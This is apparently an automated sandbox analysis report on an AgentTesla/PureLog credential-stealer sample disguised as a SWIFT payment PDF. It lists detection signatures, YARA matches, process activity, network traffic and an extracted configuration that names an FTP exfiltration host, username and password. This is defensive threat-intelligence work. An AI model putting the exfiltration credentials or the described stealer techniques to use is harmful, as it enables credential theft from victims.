Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z20SWIFT_MT103_Payment_552016_pdf.exe

Overview

General Information

Sample name:z20SWIFT_MT103_Payment_552016_pdf.exe
Analysis ID:1544202
MD5:7251aef1d7960be902f604768ff93a1a
SHA1:275dbaf6d2a5c301d9de9d8ec77cac54c8771c1f
SHA256:66e68902e968ac5c762b7d4950df70b2ef8125d38d6884ff9e37e72542e47b68
Tags:exeuser-Porcupine
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z20SWIFT_MT103_Payment_552016_pdf.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe" MD5: 7251AEF1D7960BE902F604768FF93A1A)
    • RegSvcs.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • sgxIb.exe (PID: 3740 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sgxIb.exe (PID: 3748 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1717405576.0000000003C50000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 BC 88 44 24 2B 88 44 24 2F B0 23 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x42174:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x421e6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x42270:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x42302:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x4236c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x423de:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x42474:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x42504:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        Click to see the 17 entries
        SourceRuleDescriptionAuthorStrings
        1.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 BC 88 44 24 2B 88 44 24 2F B0 23 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        1.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 BC 88 44 24 2B 88 44 24 2F B0 23 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        1.2.RegSvcs.exe.2be0000.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.2.RegSvcs.exe.2be0000.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            1.2.RegSvcs.exe.2be0000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 58 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6584, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeReversingLabs: Detection: 23%
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeVirustotal: Detection: 27%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeJoe Sandbox ML: detected
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb, source: sgxIb.exe, 00000003.00000000.1865369289.0000000000512000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe.1.dr
              Source: Binary string: wntdll.pdbUGP source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1708975577.0000000004600000.00000004.00001000.00020000.00000000.sdmp, z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1709106388.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1708975577.0000000004600000.00000004.00001000.00020000.00000000.sdmp, z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1709106388.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: sgxIb.exe, 00000003.00000000.1865369289.0000000000512000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe.1.dr
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D

              Networking

              barindex
              Source: global trafficTCP traffic: 110.4.45.197 ports 64197,65301,62212,63028,60708,61623,63207,54096,60946,53082,62758,63606,56313,60557,62806,54798,51661,61202,55923,60594,51106,50830,63691,64760,64346,63511,64227,55195,53154,1,2,53273,53571,52025,56883,58567,51358,21
              Source: global trafficTCP traffic: 192.168.2.4:49733 -> 110.4.45.197:64346
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewIP Address: 110.4.45.197 110.4.45.197
              Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49732 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
              Source: RegSvcs.exe, 00000001.00000002.4161341051.0000000005659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co
              Source: RegSvcs.exe, 00000001.00000002.4156259862.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4156259862.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4156259862.0000000002F07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
              Source: RegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: RegSvcs.exe, 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: RegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: RegSvcs.exe, 00000001.00000002.4156259862.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

              System Summary

              barindex
              Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 0.2.z20SWIFT_MT103_Payment_552016_pdf.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 00000000.00000002.1717405576.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 00000001.00000002.4153975338.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: initial sampleStatic PE information: Filename: z20SWIFT_MT103_Payment_552016_pdf.exe
              Source: initial sampleStatic PE information: Filename: z20SWIFT_MT103_Payment_552016_pdf.exe
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00409A400_2_00409A40
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004120380_2_00412038
